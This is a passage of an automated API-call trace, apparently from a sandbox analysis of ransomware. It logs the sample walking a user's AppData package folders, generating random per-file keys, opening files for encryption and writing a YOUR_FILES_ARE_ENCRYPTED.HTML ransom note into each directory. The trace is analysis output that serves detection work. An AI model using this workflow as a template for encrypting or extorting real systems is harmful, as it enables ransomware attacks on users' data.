lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ec6c618, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ec6c618, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.234] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0115.234] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.234] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned 145 [0115.234] GetProcessHeap () returned 0x600000 [0115.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.236] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore" [0115.236] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*" [0115.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0115.238] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.238] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2eef4cf1, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2eef4cf1, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.238] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.238] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 165 [0115.238] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.238] lstrlenW (lpString=".dat") returned 4 [0115.238] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.238] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0115.239] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0115.239] GetProcessHeap () returned 0x600000 [0115.239] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.243] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="A9") returned 2 [0115.243] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="EB") returned 2 [0115.243] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="E3") returned 2 [0115.243] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="78") returned 2 [0115.243] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="2D") returned 2 [0115.243] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="08") returned 2 [0115.243] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="62") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="D6") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="DD") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="B4") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="2A") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="37") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="23") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="05") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="95") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="29") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="FB") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="DB") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="7B") returned 2 [0115.244] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="C0") returned 2 [0115.244] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="B7") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="9C") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="49") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="14") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="27") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="D2") returned 2 [0115.244] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="20") returned 2 [0115.244] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="DF") returned 2 [0115.244] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="37") returned 2 [0115.244] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="F9") returned 2 [0115.244] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="BA") returned 2 [0115.244] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="49") returned 2 [0115.246] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.246] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.246] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.246] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2ecb8a69, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.246] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.246] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 170 [0115.247] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.247] lstrlenW (lpString=".LOG1") returned 5 [0115.247] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.247] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2ecb8a69, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.247] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.247] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 170 [0115.247] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.247] lstrlenW (lpString=".LOG2") returned 5 [0115.247] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.247] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2ecb8a69, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.247] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0115.247] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 175 [0115.247] GetProcessHeap () returned 0x600000 [0115.247] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.249] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.250] CloseHandle (hObject=0x324) returned 1 [0115.251] GetProcessHeap () returned 0x600000 [0115.251] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.251] GetProcessHeap () returned 0x600000 [0115.251] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.251] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2ec6c618, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2ecb8a69, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2ecb8a69, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.251] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.251] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 159 [0115.251] GetProcessHeap () returned 0x600000 [0115.251] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Microsoft.BingNews_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\microsoft.bingnews_4.6.169.0_x86__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.252] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.255] CloseHandle (hObject=0x214) returned 1 [0115.255] GetProcessHeap () returned 0x600000 [0115.255] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.255] GetProcessHeap () returned 0x600000 [0115.255] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.257] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.257] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.257] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState") returned 94 [0115.257] GetProcessHeap () returned 0x600000 [0115.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.258] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState" [0115.258] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState\\*" [0115.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.258] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.258] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.258] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.259] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.259] GetProcessHeap () returned 0x600000 [0115.259] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingnews_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.260] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.261] CloseHandle (hObject=0x214) returned 1 [0115.261] GetProcessHeap () returned 0x600000 [0115.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.261] GetProcessHeap () returned 0x600000 [0115.261] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.262] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.262] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.262] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings") returned 90 [0115.262] GetProcessHeap () returned 0x600000 [0115.262] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.263] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings" [0115.263] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\*" [0115.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingNews_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.263] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2e8b2b66, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2e8b2b66, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2e8b2b66, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.263] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e8b2b66, 